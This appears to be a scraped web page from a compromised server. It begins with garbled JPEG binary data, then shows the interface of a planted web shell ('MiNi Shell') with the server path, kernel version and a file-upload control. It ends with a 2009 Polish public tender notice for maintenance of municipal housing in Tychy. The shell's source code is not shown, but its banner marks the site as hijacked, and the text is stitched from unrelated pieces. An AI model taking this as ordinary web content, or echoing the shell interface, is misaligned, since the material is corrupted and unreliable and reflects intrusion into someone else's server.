JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091001/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091001/167265-N-2009.html

<p class="kh_header"><b>Tychy: Utrzymanie techniczne nieruchomości 
administrowanych przez Rejon Obsługi Mieszkańców Nr  II w Tychach
w zakresie wykonywania remontów branży instalacyjnej i ogólnobudowlanej 
oraz bieżącej konserwacji  wraz z  całodobowym świadczeniem czynności pogotowia technicznego.</b><br>
<b>Numer ogłoszenia: 167265 - 2009; data zamieszczenia: 01.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Zarząd Budynków Mieszkalnych , ul. Filaretów 31, 43-100 Tychy, woj. śląskie, tel. 032 2274091 w. 133, faks 032 2273145.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.umtychy.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Gminna Samorządowa Jednostka Organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie techniczne nieruchomości 
administrowanych przez Rejon Obsługi Mieszkańców Nr  II w Tychach
w zakresie wykonywania remontów branży instalacyjnej i ogólnobudowlanej 
oraz bieżącej konserwacji  wraz z  całodobowym świadczeniem czynności pogotowia technicznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest techniczne utrzymanie nieruchomości w zakresie:
-  wykonywania remontów branży instalacyjnej: wodociągowej, kanalizacyjnej, centralnego  
   ogrzewania, gazowej i elektrycznej oraz branży i ogólnobudowlanej 
-  wykonywania robót konserwacyjnych wraz  z całodobowym świadczeniem czynności 
   pogotowia technicznego
w nieruchomościach szczegółowo określonych w załączniku Nr 1 do Umowy, którymi w imieniu Zamawiającego administruje MZBM w Tychach poprzez swoją jednostkę organizacyjną, zwaną dalej ROM- em, a to :
ROM Nr II z siedzibą w Tychach, przy ul. Budowlanych 41, nr tel. (032) 227-29- 24

Zakres robót obejmuje m.in.:

I. BRANŻA INSTALACYJNA 
  
1.  Wewnętrzna instalacja wodociągowa:
Utrzymanie w pełnej sprawności technicznej wewnętrznej instalacji wodociągowej zapewniając stały dopływ wody poprzez m.in: 
1/  dokonywanie napraw awaryjnych przecieków na instalacji licząc od wodomierza głównego w 
     budynku do odbiornika;
2/  plombowanie wodomierzy w lokalach mieszkalnych, użytkowych i pomieszczeniach 
     wspólnego użytku;
3/  dokonywanie dwa razy w roku odczytów wodomierzy we wszystkich lokalach (mieszkalnych 
     i użytkowych) z odnotowaniem wskazań zużycia wody;         
4/  reagowanie na zgłoszenie awarii do 15 min. od momentu przyjęcia zgłoszenia; 
5/  kontrola stanu plomb wodomierzy głównych i indywidualnych w lokalach mieszkalnych, 
     użytkowych i pomieszczeniach wspólnego użytku;
6/  skuteczne zabezpieczenie awarii, w czasie nie dłuższym niż 1 godzina od momentu przyjęcia  
     zgłoszenia, poprzez zamknięcie zaworu wodociągowego, celem uniknięcia nadmiernych 
     szkód w nieruchomości oraz powiadomienie ROM-u (najpóźniej do godziny 900 rano dnia 
     następnego) o zaistniałej awarii, celem jej usunięcia w ramach napraw bieżących;
7/  informacja o zgłoszonej awarii winna zostać odnotowana w prowadzonym przez Wykonawcę 
     (dyspozytora pogotowia technicznego) rejestrze zgłoszeń, zawierającym m.in. datę przyjęcia 
      zgłoszenia, miejsce awarii, datę jej usunięcia, itp. ;
8/  w przypadku stwierdzenia awarii nie leżącej po stronie Zamawiającego należy niezwłocznie 
     zawiadomić właściciela sieci; 

9/ roboty wykraczające poza w/w zakres będą realizowane na podstawie odrębnych zleceń 
    i rozliczane kosztorysem powykonawczym;


2.  Wewnętrzna instalacja kanalizacyjna:
Utrzymanie w pełnej sprawności technicznej wewnętrznej instalacji kanalizacyjnej poprzez m.in: 
1/  dokonywanie napraw awaryjnych przecieków na instalacji licząc od pierwszej studni 
     rewizyjnej na sieci głównej do odbiornika;
2/  usuwanie niedrożności instalacji poziomej do pierwszej studni rewizyjnej na sieci głównej:
     -  usuwanie niedrożności przykanalików
     -  usuwanie niedrożności pionów, poziomów z wyjątkiem syfonów i kratek ściekowych 
        w lokalach mieszkalnych i użytkowych (nie dotyczy wolnostanów) 
     -  czyszczenie kratek ściekowych w pomieszczeniach wspólnego użytku
     -  czyszczenie rury deszczowej z osadnikiem i syfonem
     -  czyszczenie i udrażnianie czyszczaka żeliwnego ulicznego kanalizacyjnego          
3/  reagowanie na zgłoszenie awarii do 15 min. od momentu jego przyjęcia i skuteczne  
     zabezpieczenie w czasie nie dłuższym niż 1 godzina od chwili zgłoszenia;
4/  usunięcie zanieczyszczeń powstałych w wyniku awarii kanalizacyjnej (w pomieszczeniach    
     wspólnego użytku);
5/  udrożnienie rur zsypowych w komorach zsypowych;
6/  skuteczne zabezpieczenie awarii, w czasie nie dłuższym niż 1 godzina oraz powiadomienie   
     ROM-u (najpóźniej do godziny 900 rano dnia następnego) o zaistniałej awarii, celem jej 
     usunięcia w ramach napraw bieżących;
7/  informacja o zgłoszonej awarii winna zostać odnotowana w prowadzonym przez Wykonawcę 
     (dyspozytora pogotowia technicznego) rejestrze zgłoszeń, zawierającym m.in. datę przyjęcia 
      zgłoszenia, miejsce awarii, datę jej usunięcia, itp.;
8/  w przypadku stwierdzenia awarii nie leżącej po stronie Zamawiającego należy niezwłocznie 
     zawiadomić właściciela sieci;
9/  roboty wykraczające poza w/w zakres będą realizowane na podstawie odrębnych zleceń
     i rozliczane kosztorysem powykonawczym.
3.  Wewnętrzna  instalacja  centralnego  ogrzewania:
Utrzymanie w pełnej sprawności technicznej wewnętrznej instalacji c.o. wraz z urządzeniami poprzez, m.in.: 
1/  usunięcie przecieków na instalacji;
2/  likwidację zapowietrzeń instalacji w okresie sezonu grzewczego;
3/  regulację instalacji z wymianą pojedynczych kryz;
4/  czyszczenie grzejników;
5/  przeprowadzenie przeglądów instalacji c.o. i urządzeń przed rozpoczęciem sezonu 
     grzewczego;
6/  przeprowadzenie przeglądów instalacji c.o. i urządzeń po zakończeniu sezonu grzewczego 
     wraz z zawieszeniem czynnika grzewczego;
7/  reagowanie na zgłoszenie awarii do 15 min. od momentu jego przyjęcia i skuteczne 
     zabezpieczenie w czasie nie dłuższym niż 1 godzina od chwili zgłoszenia;
8/  informacja o zgłoszonej awarii winna zostać odnotowana w prowadzonym przez Wykonawcę 
     (dyspozytora pogotowia technicznego) rejestrze zgłoszeń, zawierającym m.in. datę przyjęcia 
     zgłoszenia, miejsce awarii, datę jej usunięcia, itp.;
9/  w przypadku stwierdzenia awarii nie leżącej po stronie Zamawiającego należy niezwłocznie  
     zawiadomić właściciela sieci
10/  dokonywanie przeglądów szczelności, naprawa zaworów występujących w węźle (zawory 
      bezpieczeństwa, czerpalne, spustowe, zaporowe);
11/  wymiana uszczelek w połączeniach kołnierzowych i zaworach z gwintem;
12/  okresowe kontrolowanie wskazań przyrządów pomiarowych (manometry, termometry, 
      liczniki poboru ciepła i urządzenia kontrolno-pomiarowe)
13/ w trakcie sezonu grzewczego w przypadku wyłączenia budynku /lokalu na czas 
      ponad 48 godzin spowodowanego awarią, z wynagrodzenia Zleceniobiorcy potrącona 
      będzie kwota wyliczona wg wzoru określonego w SIWZ ;
14/ roboty wykraczające poza w/w zakres będą realizowane na podstawie odrębnych zleceń
      i rozliczane kosztorysem powykonawczym;
4.  Wewnętrzna  instalacja  gazowa:
Utrzymanie w pełnej sprawności technicznej wewnętrznej instalacji gazowej w budynku 
od zaworu głównego poprzez, m.in.:  
1/  likwidację przecieku gazu na instalacji do zaworu odcinającego przed urządzeniem gazowym 
     w lokalu;
2/  przeprowadzanie prób szczelności po każdej naprawie;
3/  przeprowadzenie jeden raz w roku kontroli stanu technicznego sprawności instalacji gazowej 
     i urządzeń, wraz z przeprowadzaniem prób szczelności zakończonego spisaniem protokołu
4/  zgłaszanie Zamawiającemu o dokonanych samowolnych przeróbkach instalacji gazowej 
     w lokalach;
5/  konserwację i naprawy szafek gazowych;
6/  likwidację nieprawidłowości podłączeń gazowych (na wąż);
7/  reagowanie na zgłoszenie awarii do 15 min. od momentu jego przyjęcia i skuteczne 
     zabezpieczenie w czasie nie dłuższym niż 1 godzina od chwili zgłoszenia;
8/  informacja o zgłoszonej awarii winna zostać odnotowana w prowadzonym przez Wykonawcę   
     (dyspozytora pogotowia technicznego) rejestrze zgłoszeń, zawierającym m.in. datę przyjęcia 
     zgłoszenia, miejsce awarii, datę jej usunięcia, itp.;
9/  w przypadku stwierdzenia awarii nie leżącej po stronie Zamawiającego należy niezwłocznie 
     zawiadomić właściciela sieci;
10/ roboty wykraczające poza w/w zakres należy realizować wyłącznie na podstawie odrębnych 
      zleceń i rozliczać kosztorysem powykonawczym;

5.  Wewnętrzna instalacja elektryczna:
Utrzymanie w pełnej sprawności wewnętrznej instalacji elektrycznej poprzez m.in.:
 1/  usuwanie awarii braku dopływu prądu do mieszkań, lokali użytkowych, pomieszczeń 
      wspólnego użytku (klatek schodowych, piwnic, strychów, pralni);
 2/  usuwanie przerw w dopływie prądu (np. upalone przewody) - do 10m;
 3/  naprawę połączeń zatablicowych;
 4/  wymianę bezpieczników i gniazd bezpiecznikowych w tablicach administracyjnych danego 
      budynku;
 5/  wymianę listew rozgałęźnych w pomieszczeniach wspólnego użytku;
 6/  wymianę lub uzupełnienie żarówek zwykłych i świetlówek w lampach klatek schodowych, 
      przed klatkami schodowymi, w piwnicach oraz lampkach orientacyjnych w pomieszczeniach 
      wspólnego użytku;
 7/  przeprowadzenie jeden raz w roku przeglądu stanu technicznego sprawności instalacji 
      elektrycznych zakończonego spisaniem protokołu;
 8/  wykonanie badań ochronnych i pomiarów instalacji elektrycznej (tylko w lokalach  
      mieszkalnych i usługowych wyszczególnionych w załączniku Nr 2a do projektu umowy);
 9/  kontrola stanu plomb na urządzeniach kontrolno-pomiarowych w nieruchomościach (liczniki 
      administracyjne);
10/ reagowanie na zgłoszenie awarii do 15 min. od momentu jego przyjęcia i skuteczne 
      zabezpieczenie w czasie nie dłuższym niż 1 godzina od chwili zgłoszenia;
11/ informacja o zgłoszonej awarii winna zostać odnotowana w prowadzonym przez 
      Wykonawcę (dyspozytora pogotowia technicznego) rejestrze zgłoszeń, zawierającym m.in. 
      datę przyjęcia zgłoszenia, datę usunięcia, miejsce awarii itp.
12/ w przypadku stwierdzenia awarii nie leżącej po stronie Zamawiającego należy niezwłocznie 
      zawiadomić właściciela sieci;
13/ roboty wykraczające poza w/w zakres będą realizowane na podstawie odrębnych zleceń i 
      rozliczane kosztorysem powykonawczym;

6.   Branża budowlana:
1/ roboty ślusarskie m.in.:
    a/  naprawa zamków, skobli i wkładek patentowych drzwi wejściowych (klatki schodowe, 
         piwnice, strychy) ;
    b/  naprawa i regulacja samozamykaczy;     
    c/  otwieranie i zabezpieczanie lokalu podczas komisyjnego otwarcia lokalu oraz zdarzeń 
         losowych;
d/  zabezpieczenie otworów kratek wycieraczkowych, naświetli, balustrad, pochwytów, 
         itp. w przypadku kradzieży, dewastacji i innych zdarzeń losowych;

2/ roboty stolarsko - szklarskie m.in.:
    a/ zabezpieczenie w pomieszczeniach wspólnego użytku stolarki okiennej i drzwiowej, 
        wyłazów dachowych w przypadku dewastacji i innych zdarzeń losowych;
     
3/ roboty dekarskie m.in.:
    a/  awaryjne uszczelnienie połaci dachowych i obróbek blacharskich;
    b/  awaryjne miejscowe usuwanie śniegu, nawisów oraz zbijanie sopli z połaci dachowych;
    c/  miejscowe czyszczenie koszy zlewowych i rynien;

4/ roboty murarsko - tynkarskie m.in.:
    a/  skucie głuchych i spękanych tynków stwarzających zagrożenie dla życia i zdrowia;

5/ roboty wykraczające poza w/w zakres będą realizowane wyłącznie na podstawie odrębnych 
    zleceń i rozliczane kosztorysem powykonawczym, a w szczególności:
    a/  awaryjna wymiana stolarki okiennej i drzwiowej, posadzek, tynków w lokalach w najmie
    b/  roboty murarsko-tynkarskie, malarskie i stolarskie;
    c/  roboty ślusarskie, dekarsko-blacharskie i izolacyjne;
    d/  drobne naprawy elementów małej architektury;
    e/  drobne roboty brukarskie;
    f/  inne roboty nie przewidziane w punktach a-e ;

6/ Zamawiający zastrzega sobie prawo zlecenia drobnych remontów w lokalach właścicieli;


Wykonawcy winni dokonać wizji lokalnej nieruchomości wyszczególnionych 
w Załączniku Nr 1 do Umowy celem zapoznania się z ich stanem technicznym 

Przedmiot  zamówienia obejmuje wykonanie wszelkich prac i czynności niezbędnych 
do prawidłowego zrealizowania niniejszego zamówienia w w/w  zakresie..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.30.00.00-0, 45.33.00.00-0, 45.31.12.00-2, 45.26.19.00-3, 45.26.13.20-3, 45.26.25.22-6, 45.41.00.00-4, 45.44.00.00-3, 45.43.21.00-5, 45.42.00.00-7, 45.42.11.11-5, 45.42.11.12-2, 45.42.11.31-1, 45.42.11.32-8, 45.32.00.00-6, 45.23.32.53-7, 50.70.00.00-2, 50.87.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 24 000,00 zł (słownie: dwadzieścia cztery tysiące zlotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O zamówienie mogą ubiegać się Wykonawcy którzy spełniają warunki określone na 
      podstawie art. 22 ust.1 ustawy z dnia 29 stycznia 2004 roku - Prawo zamówień publicznych
      (tekst jednolity Dz.U. z 20 listopada 2007 r., Nr 223, poz. 1655, ze zm.), tj.:  
    a)  posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli 
          ustawy nakładają obowiązek posiadania takich uprawnień; 
    b)  posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym  
         i osobami zdolnymi do wykonania zamówienia  lub przedstawią pisemne zobowiązanie 
         innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do 
         wykonania zamówienia; 
   c)  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;    
   d)  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia; 
     oraz spełnią warunki określone w specyfikacji istotnych warunków zamówienia. 

      ZAMAWIAJĄCY WYMAGA, ABY WYKONAWCA WYKAZAŁ, ŻE:

  1)  dysponuje lub będzie dysponował osobą/ osobami zdolnymi do wykonania zamówienia, tj.:  
        co najmniej jedną osobą posiadającą:
   a) uprawnienia budowlane w specjalności  konstrukcyjno - budowlanej ;
   b) uprawnienia budowlane branży instalacyjno-inżynieryjnej w zakresie instalacji sanitarnych;
   c) uprawnienia budowlane instalacyjno-inżynieryjnej w zakresie instalacji elektrycznych;
   d) kwalifikacje uprawniające do wykonywania pracy na stanowisku dozoru ( D) w zakresie 
       konserwacji, remontów dla urządzeń , instalacji i sieci elektroenergetycznych o napięciu 
       nie wyższym niż 1 kV;           
   e)  kwalifikacje uprawniające do wykonywania pracy na stanowisku eksploatacji w zakresie 
        obsługi,  konserwacji, remontów dla urządzeń , instalacji i sieci elektroenergetycznych 
        o napięciu nie wyższym niż 1 kV;  
 f) kwalifikacje uprawniające do wykonywania prac kontrolno - pomiarowych z pomiarami  
     ochrony przeciwporażeniowej i instalacji odgromowej;
 g)  kwalifikacje uprawniające do wykonywania pracy na stanowisku dozoru nad eksploatacją
      w zakresie obsługi, konserwacji, remontów, kontrolno-pomiarowym urządzeń, instalacji         
      gazowych; 
 h)  kwalifikacje uprawniające do wykonywania pracy na stanowisku eksploatacji w zakresie 
      obsługi, konserwacji, remontów, kontrolno-pomiarowym urządzeń, instalacji gazowych; 

2)  w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, 
      a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał:

      - co najmniej dwie roboty zrealizowane w ramach odrębnych umów, w zakresie 
      wykonywania remontów branży instalacyjnej (wod-kan,  c.o., gaz , elektrycznej) 
      i ogólnobudowlanej oraz bieżącej konserwacji instalacji (wod - kan, c.o., gaz , elektrycznej) 
      wraz z całodobowym świadczeniem czynności pogotowia technicznego, realizowane
      w sposób ciągły równolegle przez okres co najmniej 1 roku , w nieruchomościach 
      mieszkalnych o powierzchni użytkowej każdej z tych robót nie mniejszej niż 54 500 m2 
      i wartości ogółem każdej z tych robót nie mniejszej niż 438 000,00ł (brutto)  

       l u b  
       - co najmniej jedną robotę w zakresie wykonywania remontów branży instalacyjnej 
      (wod-kan, c.o., gaz , elektrycznej) i ogólnobudowlanej oraz bieżącej konserwacji instalacji 
      (wod-kan, c.o., gaz , elektrycznej) wraz z  całodobowym świadczeniem czynności 
      pogotowia technicznego, realizowaną w sposób ciągły przez okres co najmniej 1 roku ,
      w nieruchomościach mieszkalnych o powierzchni użytkowej ogółem nie mniejszej 
      niż 109 000 m2 i wartości ogółem z tych robót nie mniejszej niż 876 000,00 zł 
      (brutto)  

 
3)  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
      - o wartości ubezpieczenia nie mniejszej niż  800 000,00 zł.     
     
2.  Sprawdzenie spełnienia warunków udziału w postępowaniu zostanie dokonane na podstawie 
     złożonego oświadczenia oraz dołączonych do oferty nw. dokumentów według zasady spełnia / nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.  Oświadczenie potwierdzające spełnienie warunku udziału w postępowaniu 
       stosownie do treści art. 44 w związku z art. 22 ust. 1 pkt. 1)÷ 4)  ustawy - Pzp. 
         - wzór druku oświadczenia stanowi załącznik do specyfikacji,
        (W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia 
         oświadczenie o spełnianiu warunków udziału w postępowaniu składają wszyscy Wykonawcy)


   1.1. Na potwierdzenie, że Wykonawca posiada uprawnienia do wykonywania określonej 
        działalności lub czynności (art. 22 ust. 1 pkt. 1) ustawy -Pzp.) oraz, że nie podlega 
        wykluczeniu z postępowania o udzielenie zamówienia (art. 22 ust. 1 pkt. 4) ustawy-Pzp.):  

 a)  aktualny odpis z właściwego rejestru (KRS) albo aktualne zaświadczenie o wpisie do 
       ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru 
       lub zgłoszenia do ewidencji działalności gospodarcze - wystawiony  nie wcześniej 
       niż 6 miesięcy przed upływem terminu składania ofert ;   

b) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz 
     właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia 
       Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem 
       podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń , 
       że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych 
       płatności lub wstrzymanie w całości wykonania decyzji właściwego organu- wystawionych 
       nie wcześniej niż 3 miesiące przed upływem terminu składania ofert ;
( W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia 
       przedmiotowe dokumenty wymienione w punkcie 1.1.lit.a) i b) muszą być złożone 
       dla każdego z nich).


1.2.  Na potwierdzenie, że Wykonawca posiada niezbędna wiedzę i doświadczenie oraz, 
        że dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia
        (art. 22 ust. 1 pkt. 2) ustawy- Pzp.):  
  1)   wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed dniem 
     wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres działalności jest 
     krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym 
     stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania,  
     w którym należy wykazać:  
     - co najmniej dwie roboty zrealizowane w ramach odrębnych umów, w zakresie 
      wykonywania remontów branży instalacyjnej (wod-kan,  c.o., gaz , elektrycznej) 
      i ogólnobudowlanej oraz bieżącej konserwacji instalacji (wod - kan, c.o., gaz , elektrycznej) 
      wraz z całodobowym świadczeniem czynności pogotowia technicznego, realizowane
      w sposób ciągły równolegle przez okres co najmniej 1 roku , w nieruchomościach 
      mieszkalnych o powierzchni użytkowej każdej z tych robót nie mniejszej niż 54 500 m2 
      i wartości ogółem każdej z tych robót nie mniejszej niż 438 000,00  zł (brutto)  

       l u b  
       - co najmniej jedną robotę w zakresie wykonywania remontów branży instalacyjnej 
      (wod-kan, c.o., gaz , elektrycznej) i ogólnobudowlanej oraz bieżącej konserwacji instalacji 
      (wod-kan, c.o., gaz , elektrycznej) wraz z  całodobowym świadczeniem czynności 
      pogotowia technicznego, realizowaną w sposób ciągły przez okres co najmniej 1 roku ,
      w nieruchomościach mieszkalnych o powierzchni użytkowej ogółem nie mniejszej niż 
     109 000 m2 i wartości ogółem każdej z tych robót nie mniejszej niż 876 000,00 zł 
     (brutto)  

 2)   wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą 
     uczestniczyć w wykonaniu zamówienia, wraz z informacjami na temat ich kwalifikacji    
     zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także  
     zakresu wykonywanych przez nich czynności. 
     W wykazie należy wskazać, że Wykonawca dysponuje lub będzie dysponował:  
     co najmniej jedną osobą posiadającą:

  a) uprawnienia budowlane w specjalności  konstrukcyjno - budowlanej ;

  b) uprawnienia budowlane branży instalacyjno-inżynieryjnej w zakresie instalacji sanitarnych;

  c) uprawnienia budowlane instalacyjno-inżynieryjnej w zakresie instalacji elektrycznych;

  d) kwalifikacje uprawniające do wykonywania pracy na stanowisku dozoru ( D) w zakresie 
      konserwacji, remontów dla urządzeń , instalacji i sieci elektroenergetycznych o napięciu 
        nie wyższym niż 1 kV;        
   
  e) kwalifikacje uprawniające do wykonywania pracy na stanowisku eksploatacji w zakresie 
      obsługi,  konserwacji, remontów dla urządzeń , instalacji i sieci elektroenergetycznych 
       o napięciu nie wyższym niż 1 kV;   

                                                                                                      
 f) kwalifikacje uprawniające do wykonywania prac kontrolno - pomiarowych z pomiarami  
     ochrony przeciwporażeniowej i instalacji odgromowej;

 g)  kwalifikacje uprawniające do wykonywania pracy na stanowisku dozoru nad eksploatacją
      w zakresie obsługi, konserwacji, remontów, kontrolno-pomiarowym urządzeń, instalacji         
      gazowych; 

 h)  kwalifikacje uprawniające do wykonywania pracy na stanowisku eksploatacji w zakresie 
      obsługi, konserwacji, remontów, kontrolno-pomiarowym urządzeń, instalacji gazowych; 
       Na potwierdzenie wymaganych kwalifikacji zawodowych do wykazu osób należy   
     załączyć:
  - uprawnienia budowlane w specjalności: konstrukcyjno - budowlanej oraz aktualne 
      zaświadczenie wydane przez właściwą Izbę Inżynierów;
- uprawnienia budowlane branży instalacyjno-inżynieryjnej w zakresie instalacji sanitarnych   
